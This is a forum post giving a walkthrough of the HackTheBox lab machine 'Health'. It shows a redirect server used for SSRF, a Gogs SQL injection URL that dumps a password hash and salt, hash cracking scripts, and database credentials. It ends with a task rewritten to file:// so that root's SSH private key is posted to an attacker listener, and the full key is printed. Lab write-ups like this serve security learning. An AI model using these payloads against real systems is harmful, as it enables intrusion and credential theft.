[Original] HTB health (MEDIUM)
Posted: 2023-1-5 12:26
References:
https://gatogamer1155.github.io/hackthebox/health/
https://mark0.pw/2022/11/12/HackTheBox-Health-Writeup/

As usual, start with a port scan.

rustscan 10.10.11.176

nmap reports port 3000 as filtered: something on the host answers there, but a firewall drops our packets, so the service can only be reached from the box itself.

Open the website. It is a health-check service: you give it a URL to monitor and a webhook URL, and it reports whether the HTTP service is reachable, whether the server is up, or whether a firewall is blocking access. A server that fetches arbitrary URLs on our behalf is an SSRF primitive.

Use SSRF to reach port 3000. Background reading on SSRF (Chinese):
https://security.tencent.com/index.php/blog/msg/179

The checker follows redirects, so point it at a server we control that answers every request with a 302 to http://127.0.0.1:3000/. The checker follows that redirect from inside the box, where port 3000 is not filtered, and delivers the response to the webhook URL, where a listener on port 4444 catches it.

#!/usr/bin/python3
# Minimal HTTP server that answers every GET with a 302 to the URL given on
# the command line. The health checker fetches us from the outside and then
# follows the Location header to http://127.0.0.1:3000/, the port that is
# filtered from our side but open on the box's loopback interface.
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', sys.argv[1])   # target passed as argv[1]
        self.end_headers()

# Port 80, so the monitored URL needs no explicit port.
HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
sudo python3 redirect.py http://127.0.0.1:3000/   # redirect server on port 80
netcat -lvnp 4444                                  # receives the webhook POST

In the web form, the webhook (payload) URL is our listener, the monitored URL is the redirect server, and the schedule fires every minute:

http://10.10.16.16:4444
http://10.10.16.16
*/1 * * * *

The webhook receives a JSON document whose body field is the HTML of the page, with newlines, tabs and slashes escaped as \n, \t and \/. Strip those escapes (or run the document through a JSON decoder) to recover the page.

The recovered page, as shown in the reference article: the site on port 3000 is built with Gogs, a self-hosted Git service, so the source code is available and the known CVEs can be checked.

searchsploit gogs
searchsploit -p 35238.txt

The match (35238.txt) is a SQL injection in the user search API: the q parameter is concatenated into the search query. The payload uses /**/ comment sequences instead of spaces so that no space appears in the URL we put in the Location header. The subquery sits in the third column of the UNION, which is rendered as username in the JSON response. Dump the password hash from the user table through the same redirect server:

sudo python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"

The hash comes back in the username field of the second entry (still JSON-escaped, since it travelled inside the webhook body):

[{\"username\":\"susanne\",
\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},
{\"username\":\"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37\",
\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}],

Swap passwd for salt in the same query to dump the salt:

sudo python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/salt/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"

[{\"username\":\"susanne\",
\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},
{\"username\":\"sO3XIbeW14\",
\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}]

With the salt known, crack the hash. Gogs stores passwords as PBKDF2-HMAC-SHA256 with 10000 iterations and a 50-byte output, hex-encoded, which is hashcat mode 10900; that mode takes its input as sha256:<iterations>:<base64 salt>:<base64 hash>. The cut -c1-14 below trims off the encoded trailing newline that echo adds (and the padding with it), leaving the unpadded base64 of the 10-byte salt; echo -n would avoid the trick.

echo 'sha256:10000:'$(echo 'sO3XIbeW14' | base64 | cut -c1-14)':'$(echo '66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37' | xxd -r -p | base64)

sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=

Crack it with hashcat and rockyou.txt:

hashcat -m 10900 hash.txt wordlist/SecLists-master/Passwords/Leaked-Databases/rockyou.txt

Result: susanne / february15

ssh susanne@10.10.11.176
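As an added check (example code, not from the original post), the hashcat line above can be built, and any recovered password verified, in a few lines of Python: Gogs hashes passwords with PBKDF2-HMAC-SHA256, 10000 iterations, 50-byte output, hex-encoded (EncodePasswd in Gogs's models/user.go). The salt and hash constants are the values dumped above; the tiny dictionary helper and the throwaway salt 0123456789 are for illustration only.

```python
#!/usr/bin/env python3
"""Rebuild a Gogs password record as a hashcat -m 10900 line and verify a
candidate password offline (added example, not from the original post).

Gogs: passwd = hex(PBKDF2-HMAC-SHA256(password, salt, 10000 iterations, 50 bytes)).
hashcat 10900: sha256:<iterations>:<base64 salt>:<base64 raw hash>.
"""
import base64
import hashlib
import hmac

GOGS_ITERATIONS = 10000
GOGS_DKLEN = 50

# Values dumped from the box through the SQL injection above.
SUSANNE_SALT = "sO3XIbeW14"
SUSANNE_HASH_HEX = ("66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e"
                    "6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37")


def gogs_encode_passwd(password: str, salt: str) -> str:
    """Return the hex string Gogs writes into user.passwd."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                             GOGS_ITERATIONS, dklen=GOGS_DKLEN)
    return dk.hex()


def to_hashcat_10900(salt: str, passwd_hex: str) -> str:
    """Format salt and hex hash for hashcat -m 10900.

    Both fields are base64 of the raw bytes; encoding salt.encode() directly
    avoids the trailing newline that `echo salt | base64` would include.
    """
    b64_salt = base64.b64encode(salt.encode()).decode()
    b64_hash = base64.b64encode(bytes.fromhex(passwd_hex)).decode()
    return f"sha256:{GOGS_ITERATIONS}:{b64_salt}:{b64_hash}"


def from_hashcat_10900(line: str) -> tuple:
    """Parse a mode-10900 line back into (iterations, salt, hex hash)."""
    algo, iters, b64_salt, b64_hash = line.split(":")
    if algo != "sha256":
        raise ValueError(f"unexpected algorithm {algo!r}")
    salt = base64.b64decode(b64_salt).decode()
    passwd_hex = base64.b64decode(b64_hash).hex()
    return int(iters), salt, passwd_hex


def verify(password: str, salt: str, passwd_hex: str) -> bool:
    """Constant-time comparison of a candidate against a Gogs record."""
    return hmac.compare_digest(gogs_encode_passwd(password, salt), passwd_hex)


def crack(wordlist, salt: str, passwd_hex: str):
    """Toy dictionary attack (illustration only); returns the match or None."""
    for word in wordlist:
        if verify(word, salt, passwd_hex):
            return word
    return None


if __name__ == "__main__":
    print(to_hashcat_10900(SUSANNE_SALT, SUSANNE_HASH_HEX))
    print("february15 matches:", verify("february15", SUSANNE_SALT, SUSANNE_HASH_HEX))
```

hashcat accepts the padded base64 that to_hashcat_10900 emits (its own example hash for mode 10900 carries padding). Running the script checks the cracked password against susanne's record without involving hashcat at all, which is a useful sanity check before trying it over SSH.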

Run pspy. A cron job runs the Laravel scheduler every minute and then truncates the tasks table:

/bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
mysql laravel --execute TRUNCATE tasks

The MySQL password is in the Laravel .env file under /var/www/html:

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=laravel
DB_USERNAME=laravel
DB_PASSWORD=MYsql_strongestpass@2014+

/var/www/html/app/Http/Controllers$ cat HealthChecker.php

<?php
 
namespace App\Http\Controllers;
 
class HealthChecker
{
    public static function check($webhookUrl, $monitoredUrl, $onlyError = false)
    {
 
        $json = [];
        $json['webhookUrl'] = $webhookUrl;
        $json['monitoredUrl'] = $monitoredUrl;
 
        $res = @file_get_contents($monitoredUrl, false);
        if ($res) {
 
            if ($onlyError) {
                return $json;
            }
 
            $json['health'] = "up";
            $json['body'] = $res;
            if (isset($http_response_header)) {
            $headers = [];
            $json['message'] = $http_response_header[0];
 
            for ($i = 0; $i <= count($http_response_header) - 1; $i++) {
 
                $split = explode(':', $http_response_header[$i], 2);
 
                if (count($split) == 2) {
                    $headers[trim($split[0])] = trim($split[1]);
                } else {
                    error_log("invalid header pair: $http_response_header[$i]\n");
                }
 
            }
 
            $json['headers'] = $headers;
            }
 
        } else {
            $json['health'] = "down";
        }
 
        $content = json_encode($json);
 
        // send
        $curl = curl_init($webhookUrl);
        curl_setopt($curl, CURLOPT_HEADER, false);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_HTTPHEADER,
            array("Content-type: application/json"));
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $content);
        curl_exec($curl);
        curl_close($curl);
 
        return $json;
 
    }
}

The checker fetches monitoredUrl with @file_get_contents(), which accepts any PHP stream wrapper, not only http://, and POSTs whatever it read to webhookUrl as JSON. Both URLs come straight from the tasks table, and we now hold the database credentials, so a task can be pointed at a local file such as file:///root/.ssh/id_rsa. The scheduler that runs the check is the cron job seen in pspy, and as the next step shows it has enough privilege to read root's files.

Create a task through the web form first, with the webhook URL set to a listener on our host (the capture below uses http://10.10.14.10/), then rewrite its monitored URL before the next scheduler run; the table is truncated every minute, so this has to happen within that window:

mysql -Dlaravel -ularavel -pMYsql_strongestpass@2014+
update tasks set monitoredUrl='file:///root/.ssh/id_rsa';

Start a listener on port 80 (the task's webhook URL) and the key arrives in the next POST:
sudo netcat -lvnp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.176
POST / HTTP/1.1
Host: 10.10.14.10
Accept: */*
Content-type: application/json
Content-Length: 1835
Expect: 100-continue
 
{"webhookUrl":"http:\/\/10.10.14.10\/","monitoredUrl":"file:\/\/\/root\/.ssh\/id_rsa","health":"up","body":"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n"}
Save the body to a file (unescape the \n and \/ sequences), chmod 600 it, and log in as root:

ssh root@10.10.11.176 -i key
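Both the page-recovery step earlier (stripping \n, \t and \/ from the webhook body) and the key capture above come down to decoding the checker's JSON POST. The receiver below is an added example, not code from the original post: it replaces the netcat listener, parses the POST with a JSON decoder and writes the unescaped body to a file. The sample payloads embedded in it are constructed for testing, not captured from the box, and the output file name is an assumption.

```python
#!/usr/bin/env python3
"""Webhook receiver for the health checker's POST (added example).

HealthChecker::check() POSTs a JSON document such as
{"webhookUrl":..,"monitoredUrl":..,"health":"up","body":"<fetched content>",
"headers":{..}}. JSON encoding turns "/" into "\\/" and newlines into "\\n",
which is why the raw netcat capture looks mangled; a JSON decoder restores
the original text, so the body can be written straight to a file.
"""
import json
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer


def parse_webhook(payload: bytes) -> dict:
    """Decode the checker's JSON and return the fields that matter to us.

    body is "" when the check reported "down" (the checker omits it then).
    """
    data = json.loads(payload)
    return {
        "monitoredUrl": data.get("monitoredUrl", ""),
        "health": data.get("health", ""),
        "body": data.get("body", ""),
        "headers": data.get("headers", {}),
    }


def save_body(payload: bytes, path: str) -> int:
    """Write the unescaped body to path; return the number of characters written."""
    body = parse_webhook(payload)["body"]
    with open(path, "w", newline="") as fh:
        return fh.write(body)


class WebhookCatcher(BaseHTTPRequestHandler):
    # curl sends "Expect: 100-continue" with the JSON body (see the capture);
    # answering as HTTP/1.1 lets BaseHTTPRequestHandler reply "100 Continue".
    protocol_version = "HTTP/1.1"
    out_path = "webhook_body.txt"   # assumed output file name

    def do_POST(self):
        raw = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        try:
            info = parse_webhook(raw)
        except json.JSONDecodeError:
            self._reply(400)
            return
        print(f"[+] {info['monitoredUrl']} -> {info['health']}, "
              f"{len(info['body'])} chars of body")
        with open(self.out_path, "w", newline="") as fh:
            fh.write(info["body"])
        self._reply(200)

    def _reply(self, code: int) -> None:
        self.send_response(code)
        self.send_header("Content-Length", "0")   # required for HTTP/1.1 keep-alive
        self.end_headers()


# Constructed sample payloads in the escaped form seen in the capture above;
# not captured from the box.
SAMPLE_PAYLOAD = (
    b'{"webhookUrl":"http:\\/\\/10.10.14.10\\/",'
    b'"monitoredUrl":"file:\\/\\/\\/etc\\/hostname",'
    b'"health":"up","body":"health\\n","headers":{}}'
)
SAMPLE_DOWN = (
    b'{"webhookUrl":"http:\\/\\/10.10.14.10\\/",'
    b'"monitoredUrl":"file:\\/\\/\\/nope","health":"down"}'
)

if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 80
    print(f"listening on :{port}, body goes to {WebhookCatcher.out_path}")
    HTTPServer(("0.0.0.0", port), WebhookCatcher).serve_forever()
```

Run it with sudo (port 80) in place of netcat; when the scheduler fires, the private key lands in webhook_body.txt with its newlines intact, ready for chmod 600 and ssh -i.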


Last edited 2023-1-12 11:11 by hml189, reason: re-added images
Latest replies (3)

#2
Images are broken.
2023-1-5 13:11

#3
badboyl: Images are broken.
All the images are dead, I'll re-upload them...
2023-1-5 14:19